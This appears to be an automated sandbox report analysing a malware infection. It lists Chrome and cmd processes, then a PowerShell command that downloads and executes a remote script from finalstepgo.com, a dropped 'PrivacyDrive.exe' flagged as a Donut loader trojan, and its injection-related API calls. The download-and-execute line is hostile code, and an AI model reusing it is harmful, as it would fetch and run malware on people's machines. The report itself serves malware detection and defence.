2024-09-26 15:56:08 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	11:55:19
Start date:	26/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	11:55:19
Start date:	26/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:55:20
Start date:	26/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://google.com"
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:55:36
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe"
Imagebase:	0x7ff6fd780000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:55:36
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	11:55:37
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Imagebase:	0x7ff7582a0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:55:48
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Imagebase:	0x400000
File size:	2'881'672 bytes
MD5 hash:	80C2A36E9A14E3EDBA0B706D2433D9B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:55:58
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188
Imagebase:	0x370000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:55:58
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1736
Imagebase:	0x370000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	38.2%
Total number of Nodes:	144
Total number of Limit Nodes:	30

Executed Functions

Function 0481C583 Relevance: 11.2, APIs: 7, Instructions: 742memorynativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 0481C643
NtMapViewOfSection.NTDLL(?,00000000), ref: 0481C6EF
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?), ref: 0481CA5A
NtMapViewOfSection.NTDLL(?,00000000), ref: 0481CB0F
VirtualProtect.KERNEL32(?,?,00000008,?), ref: 0481CB2C
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0481CBD1
VirtualProtect.KERNEL32(?,?,00000002,00000000), ref: 0481CC06

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$View$AllocCreate
String ID:
API String ID: 2664363762-0
Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction ID: 3dc2e5a9718de525518bb9c8d9b0547066bb77eb40bf668327ba34f7aaf4d3f5
Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction Fuzzy Hash: 02427E716443019FE724CF68CC84B6AB7E9AF88714F044E2EF985DB261E770E951CB92

Function 059CF7B0 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1_QmwvpV2cby0IDz1RJ3uaUsdKKfpnivYYVKM617Hd8-1727366157-0.0.1.1-/api, xrefs: 059CFC47, 059CFC64
6(>*, xrefs: 059CFB0D
IK, xrefs: 059CF90A
ZABC, xrefs: 059CF91A
2$1., xrefs: 059CFB43, 059CFB4B
MSO, xrefs: 059CF912
=:li, xrefs: 059CFB05
Ga!1, xrefs: 059CFAFD

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 1_QmwvpV2cby0IDz1RJ3uaUsdKKfpnivYYVKM617Hd8-1727366157-0.0.1.1-/api$2$1.$6(>*$=:li$Ga!1$ZABC$IK$MSO
API String ID: 0-3135469529
Opcode ID: 2d38f1b14d33b7f1a386eebc0464c0b7b72036a606ac799b212b13c679b2cfe2
Instruction ID: 19d3d45125b483c5856876d9a775ab96efcbe167ac7be9971b1a85069a69cb8d
Opcode Fuzzy Hash: 2d38f1b14d33b7f1a386eebc0464c0b7b72036a606ac799b212b13c679b2cfe2
Instruction Fuzzy Hash: 42D175B020C3808BD711DF188494A6EFFEAAB96744F580C9CE4D18B352D3369949CBA7

Function 047C0C6F Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,047C07B5,?,00000001,?,81EC8B55,000000FF), ref: 047C0CAD
Thread32First.KERNEL32(00000000,0000001C), ref: 047C0CD9
Wow64SuspendThread.KERNEL32(00000000), ref: 047C0D2C
CloseHandle.KERNEL32(00000000), ref: 047C0D56

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 4a61e3bf63366bf8e52962d8f1899e29c955f498e7f3546a14fd18376c58f9da
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 6C410C71A00108EFDB18DF98C494BADB7B6EF88300F50816CEA159B7A4DB34BE45CB94

Function 047C0B1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 047C0BEB

Strings

,, xrefs: 047C0C37

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: db7cd625d6f6fc862a3805adaf6b2b4811505fb826f466c8f2b093d486a778f0
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 4741D274A00208EFDB14CF98C994BAEB7B1BF88314F20859CE515AB391D771AA85DB94

Function 047C055F Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 047C0802

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
Instruction ID: 7587d22072cce26e4686e4224942d0dcf3ed55bc51ffa657a194d94a39b2506d
Opcode Fuzzy Hash: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
Instruction Fuzzy Hash: 7112BFB0E00259DFDB14CF98C994BADBBB2FF88304F2482A9D515AB385D7346A41CF94

Function 059FF006 Relevance: 1.5, APIs: 1, Instructions: 32
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE(05A0DCE0,00000000,00000001,05A0DCD0,?), ref: 059FF04D

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: da546bca54fb93581c76fba8e16b51f6d9a3b3610cfa01d59a47f6abfbcf4929
Instruction ID: 85f4a3a36dccd220ec94bc50de2f8150ab9e567c52a48393ab2b850a0b0e4d26
Opcode Fuzzy Hash: da546bca54fb93581c76fba8e16b51f6d9a3b3610cfa01d59a47f6abfbcf4929
Instruction Fuzzy Hash: 71F0E5B02583409FE3118F10CCA8F86BFE0FF06300F06448EE0850B6C2C3B96805DB61

Function 05A06730 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(05A09F2B,?,00000006,?,?,00000018,?,?,?), ref: 05A0675E

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 05A0A1E0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8bfebeb08b80dc3faeb04d3afdfae48885418c867be272c56ff61cdd55a397
Instruction ID: 729e75ee623bc13f02bd9dc916a1b0f9cc4d10ab81c1288b945421e3a2c08476
Opcode Fuzzy Hash: cb8bfebeb08b80dc3faeb04d3afdfae48885418c867be272c56ff61cdd55a397
Instruction Fuzzy Hash: 7441C23862C300ABD7149B14E991F2EBBA6FF89714F24A82CF59697290C331E851CB56

Function 059CD3C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 059CD3D1
GetCurrentThreadId.KERNEL32 ref: 059CD3E6
GetCurrentProcessId.KERNEL32 ref: 059CD3EC
ExitProcess.KERNEL32 ref: 059CD5B0

Strings

clmn, xrefs: 059CD573, 059CD57B
ohij, xrefs: 059CD54E

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: clmn$ohij
API String ID: 1029096631-3567580053
Opcode ID: 2cab87930d75893e9ca097ef52797a1a475c485c167cd6d8b79ae3b379230b62
Instruction ID: b9184d497b2ff9853ad04608483b6d8c8a6410fd1e4c3fc61deee9af9d86c050
Opcode Fuzzy Hash: 2cab87930d75893e9ca097ef52797a1a475c485c167cd6d8b79ae3b379230b62
Instruction Fuzzy Hash: 6741587451D380ABD701AF68D558A1EFFE5EF92605F188CACE5C887292C736D810CB67

Function 059FF073 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 059FF0E5

Strings

y/z-, xrefs: 059FF07C
n;L9, xrefs: 059FF091
p3w1, xrefs: 059FF083

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: n;L9$p3w1$y/z-
API String ID: 2525500382-3403012672
Opcode ID: 9d781644114248140be912c4c395fb591dcb8e75312429dd8ccf0a9811477797
Instruction ID: b3884cb8f6dcb0ec4d62ffcc1d734cdc998045c1fc61acb8bf2abe827f462146
Opcode Fuzzy Hash: 9d781644114248140be912c4c395fb591dcb8e75312429dd8ccf0a9811477797
Instruction Fuzzy Hash: C01117B8111B02EFD3208F15C694A2AFBB5FF56701B548A0CE4A68BA51D734F852CB95

Function 0481D227 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 0481D2B9

Strings

.dll, xrefs: 0481D25E

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction ID: d86eda2ef3f23bcbff0e923217fd83d7a885d950558b4c786103489c67acd217
Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction Fuzzy Hash: 2421E7316006458FF722CFA8C484B697BE8AF46324F18466EDC56DBA51D770F8458780

Function 059FF66B Relevance: 3.1, APIs: 2, Instructions: 88
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 059FF6B5
SysAllocString.OLEAUT32(?), ref: 059FF765

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 7453fa10cf0e0a4b2e0f229fb6bc3039f3a22653d7bb00981c4d9a7d1ecfe248
Instruction ID: 7c07e5dc551d32b421cfbe733ab5ef0343af1e8c7204b35c22f20ff96bd728f4
Opcode Fuzzy Hash: 7453fa10cf0e0a4b2e0f229fb6bc3039f3a22653d7bb00981c4d9a7d1ecfe248
Instruction Fuzzy Hash: 4C3120B4110700DBEB20CF65C5C4A06BBB6FF0AB00B14898CE89A8FB4AD735E855CF64

Function 0481BE45 Relevance: 1.6, APIs: 1, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0481BEBE

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction ID: c1fd2fbe6159a4f182620d197c29940b980c0befdbd931563bbcdf74500685f3
Opcode Fuzzy Hash: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction Fuzzy Hash: 03B1C371580706ABDB269E64CC80BA7B7EDBF09314F140F1BEA59C2160E771F560DBA2

Function 05A03176 Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 05A031D3

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 08be1d9d53762ddc44734bf700f5c706041e29d9b1173c72b238551e19ded94e
Instruction ID: d09f2a4a17af0ba569ab1ca4104d51b93f741c08f56a5f5adbaae7c54a30a4d5
Opcode Fuzzy Hash: 08be1d9d53762ddc44734bf700f5c706041e29d9b1173c72b238551e19ded94e
Instruction Fuzzy Hash: FDF0123022C240ABD701AF18E988E1EBBF9EB5A701F549C1CF0C4872A2C336D860DB56

Function 059FF5FB Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 059FF637

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: ccf5543b04d1187f126b458b3b0782527aa955afda3aa52ae6837d3b1712d6f8
Instruction ID: 38d760b1fc6208565aa201d877d76070d4bc527ae61dd92bd955bea5483e1abb
Opcode Fuzzy Hash: ccf5543b04d1187f126b458b3b0782527aa955afda3aa52ae6837d3b1712d6f8
Instruction Fuzzy Hash: 6AE09234350700AFEB209F20EC97F157668AB05B01F244458FA01AB3D0EA71B801DA19

Function 059FF06E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 059FF637

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: eb813909bdd06aa80c68a32ee37fe89d7a006cce7ed295d98f784f81258626bb
Instruction ID: 671461b8bfc36304062e66ff8b6c740b6b5dcbc6b1f1319528fb7a3e1d765768
Opcode Fuzzy Hash: eb813909bdd06aa80c68a32ee37fe89d7a006cce7ed295d98f784f81258626bb
Instruction Fuzzy Hash: 89E05E713A1700BBF7305F20AC53F2A39699B01F05F204418B7017A5E0EEB1B4105A1D

Function 059D2631 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 059D2643

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 86e30f936b2473dd065a557c27b0aef1ae1118efa40e42200697428717466a9c
Instruction ID: 15c8827b90a22f1e5db1d3f291aefc9742fa27052ae46cbcf8ec73a832684be5
Opcode Fuzzy Hash: 86e30f936b2473dd065a557c27b0aef1ae1118efa40e42200697428717466a9c
Instruction Fuzzy Hash: 4DD048303E8304B6F1300A18AC1BF083914A302F22F700B00B3207C0C08DE031029A1D

Function 059FF113 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 059FF123

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 5572c3863f5df16bdd4c9be2491f1cf0c450d2172542d002263b4196d9cf05be
Instruction ID: 347adb03933a5849f4a8d088d4fc2e6ab34118dbaacdba726e9262e4694dec18
Opcode Fuzzy Hash: 5572c3863f5df16bdd4c9be2491f1cf0c450d2172542d002263b4196d9cf05be
Instruction Fuzzy Hash: 58C04C343E0301F6F5314A14FC1BF183A18B706F02F601411F3517C0D0CEE162229519

Function 05A03142 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 05A03148

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3fefa273211a9064975051b4aaef4828bc12c67f13040eb75017d3929013e343
Instruction ID: 6c4c0bd66e56686eccb75e93879faf01ce7fff0cb4bfa43112ac269e69fc9b36
Opcode Fuzzy Hash: 3fefa273211a9064975051b4aaef4828bc12c67f13040eb75017d3929013e343
Instruction Fuzzy Hash: 1FB012300801109FC5141B15BC0AF863F249F40250F010050F404480B1C51149A6C5EC

Function 059D2610 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 059D2621

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 21820cde344f83ffdda03cef5db52e1b7dba825ae1ba8ee4a6f562d21e916c58
Instruction ID: 0473a0eb87a88496ac70057102df4d8df64b471fc1692afa43c4af6564f11f68
Opcode Fuzzy Hash: 21820cde344f83ffdda03cef5db52e1b7dba825ae1ba8ee4a6f562d21e916c58
Instruction Fuzzy Hash: 0EC08C2007420CA7E210272DAC0BF0A3D2CA343762F400320FAA0480C1AE606426D5BA

Non-executed Functions

Function 047E0B95 Relevance: 26.1, Strings: 20, Instructions: 1129COMMON

Download Yara Rule

Strings

J1, xrefs: 047E0BE9
-./ , xrefs: 047E141C
<=2, xrefs: 047E161D
()./, xrefs: 047E15E6
}e, xrefs: 047E0BE1
89&', xrefs: 047E1557
KJML, xrefs: 047E0D89, 047E0D95
twvy, xrefs: 047E1448
ti, xrefs: 047E0BF4
`cb,, xrefs: 047E1411
89>?, xrefs: 047E1612
ho, xrefs: 047E1A95
<=:;, xrefs: 047E154C
lonq, xrefs: 047E1432
`Y^_, xrefs: 047E15BA
{9, xrefs: 047E0BD9
9:;<, xrefs: 047E143D
!"#m, xrefs: 047E1427
tuJK, xrefs: 047E1583
1{z}, xrefs: 047E1453

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: !"#m$()./$-./ $1{z}$89&'$89>?$9:;<$<=2$<=:;$J1$KJML$`Y^_$`cb,$ho$lonq$tuJK$twvy$ti${9$}e
API String ID: 0-3143562861
Opcode ID: 413d8ea3ea457b2b80a31d0a047ffe2c7e0a09391632f3cf7a89d01ebf83dfcb
Instruction ID: 964c7cf7e4ec2355926ec3ac0f057276455ce6b908c7dfd460f2a6d122131fef
Opcode Fuzzy Hash: 413d8ea3ea457b2b80a31d0a047ffe2c7e0a09391632f3cf7a89d01ebf83dfcb
Instruction Fuzzy Hash: 73A267B06083819BE730CF16C881BABBBE1EF89704F54891DE5C99B391DB75A844CB56

Function 059DF193 Relevance: 26.1, Strings: 20, Instructions: 1129COMMON

Download Yara Rule

Strings

()./, xrefs: 059DFBE4
KJML, xrefs: 059DF387, 059DF393
tuJK, xrefs: 059DFB81
!"#m, xrefs: 059DFA25
<=2, xrefs: 059DFC1B
J1, xrefs: 059DF1E7
9:;<, xrefs: 059DFA3B
1{z}, xrefs: 059DFA51
-./ , xrefs: 059DFA1A
